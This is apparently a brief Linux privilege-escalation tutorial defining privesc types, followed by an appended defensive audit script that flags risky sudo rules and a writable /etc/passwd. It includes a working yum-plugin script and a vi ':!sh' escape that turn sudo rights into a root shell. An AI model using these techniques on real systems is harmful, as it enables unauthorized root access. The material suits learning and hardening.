Linux privilege escalation can be difficult to explore. Here I will explain what Linux privesc is and how you can do it manually or with tools that gather information about the system and suggest public exploits based on the system's kernel version or misconfigurations.
What is Linux Privilege Escalation?
Privesc is the process of gaining more access on a system than our current user has.
If a low-privilege user can read, write or execute a script that runs with root permissions, the user can use this to escalate privileges and get a root shell. Sysadmins often leave scripts or processes running on the system with root access and without proper configuration.
Types of Privilege Escalation
Horizontal privilege escalation
This is where you expand your reach over the compromised system by taking over a different user who is on the same privilege level as you. For instance, a normal user hijacking another normal user (rather than elevating to super user).
Vertical privilege escalation
This is where you attempt to gain higher privileges or access with an existing account that you have already compromised.
For local privilege escalation attacks this might mean hijacking an account with administrator privileges or root privileges.
Exploiting Writeable /etc/passwd
Elevate privileges using yum
RFS=$(mktemp -d)
cat >$RFS/x<<EOF
[main]
plugins=1
pluginpath=$RFS
pluginconfpath=$RFS
EOF
cat >$RFS/y.conf<<EOF
[main]
enabled=1
EOF
cat >$RFS/y.py<<EOF
import os
import yum
from yum.plugins import PluginYumExit, TYPE_CORE, TYPE_INTERACTIVE
requires_api_version='2.1'
def init_hook(conduit):
    os.execl('/bin/sh','/bin/sh')
EOF
sudo yum -c $RFS/x --enableplugin=y
Escaping VI Editor
sudo -l
sudo vi
:!sh
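
As a defensive counterpart to the /etc/passwd, yum and vi sections above, this added audit example (not part of the original post) flags sudo rules that grant either binary and checks whether a file such as /etc/passwd is writable by anyone other than its owner. The function names and the sample `sudo -l` output are constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the original post); function names are hypothetical.

# Read `sudo -l` output on stdin and print every granted command whose binary
# is yum or vi (both give a root shell, as shown above), or a blanket ALL rule.
flag_sudo_escapes() {
    awk '
    /^[ \t]*\(/ {
        sub(/^[ \t]*\([^)]*\)[ \t]*/, "")   # drop the "(runas)" prefix
        gsub(/[A-Z_]+:[ \t]*/, "")          # drop tags such as NOPASSWD:
        n = split($0, cmds, /,[ \t]*/)      # one rule line can list several commands
        for (i = 1; i <= n; i++) {
            split(cmds[i], w, " ")          # w[1] is the binary, the rest are arguments
            m = split(w[1], parts, "/")
            if (parts[m] == "yum" || parts[m] == "vi" || w[1] == "ALL")
                print w[1]
        }
    }'
}

# Succeed (exit 0) when FILE is group- or world-writable. /etc/passwd should
# be mode 644 and owned by root; anything looser lets a local user edit accounts.
writable_by_non_owner() {
    [ -n "$(find "$1" -prune \( -perm -020 -o -perm -002 \) -print 2>/dev/null)" ]
}

# Constructed sample of `sudo -l` output, so the example runs offline.
SAMPLE_SUDO_L='User alice may run the following commands on host1:
    (root) NOPASSWD: /usr/bin/yum, /usr/bin/systemctl status sshd
    (root) /usr/bin/vi /etc/hosts
    (ALL : ALL) /usr/bin/tail /var/log/messages'

printf '%s\n' "$SAMPLE_SUDO_L" | flag_sudo_escapes
if writable_by_non_owner /etc/passwd; then
    echo "WARNING: /etc/passwd is writable by group or others"
fi
```

On a live host, pipe `sudo -l` for the account under review into `flag_sudo_escapes`. A rule that pins vi to one file is still flagged, because the `:!sh` escape works regardless of the file argument.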